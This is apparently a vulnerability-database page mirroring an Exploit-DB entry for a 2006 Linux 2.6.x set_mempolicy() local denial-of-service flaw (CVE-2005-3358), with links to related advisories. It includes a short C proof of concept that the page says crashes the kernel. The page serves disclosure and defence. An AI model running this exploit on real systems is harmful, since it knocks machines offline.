Lucene search

K

Linux Kernel 2.6.x - SET_MEMPOLICY Local Denial of Service

πŸ—“οΈΒ 04 Jan 2006Β 00:00:00Reported byΒ Doug ChapmanTypeΒ 
exploitdb
Β exploitdb
πŸ”—Β www.exploit-db.comπŸ‘Β 20Β Views

Linux Kernel 2.6.x SET_MEMPOLICY Denial of Service vulnerabilit

Show more
Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2005-3358
14 Dec 200519:03
–cve
UbuntuCve
CVE-2005-3358
14 Dec 200500:00
–ubuntucve
NVD
CVE-2005-3358
14 Dec 200519:03
–nvd
seebug.org
Linux Kernel set_mempolicyζœ¬εœ°ζ‹’η»ζœεŠ‘ζΌζ΄ž
17 Aug 200600:00
–seebug
Cvelist
CVE-2005-3358
14 Dec 200519:00
–cvelist
OpenVAS
SLES9: Security update for Linux kernel
10 Oct 200900:00
–openvas
OpenVAS
SLES9: Security update for Linux kernel
10 Oct 200900:00
–openvas
OpenVAS
Debian Security Advisory DSA 1017-1 (kernel-source-2.6.8)
17 Jan 200800:00
–openvas
OpenVAS
Debian: Security Advisory (DSA-1017-1)
17 Jan 200800:00
–openvas
SUSE Linux
remote denial of service in kernel
9 Feb 200616:09
–suse
Rows per page
/*
source: https://www.securityfocus.com/bid/16135/info

Linux kernel is prone to a local denial-of-service vulnerability.

This issue affects the 'set_mempolicy()' function of the 'mm/mempolicy.c' file.

Successful exploitation causes the kernel to crash, leading to a denial-of-service condition. 
*/


#include <asm/unistd.h>

main(){
        syscall(__NR_set_mempolicy,3,0,0);
        write(1,10,8192);
}

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
04 Jan 2006 00:00Current
7.4High risk
Vulners AI Score7.4
20
.json
Report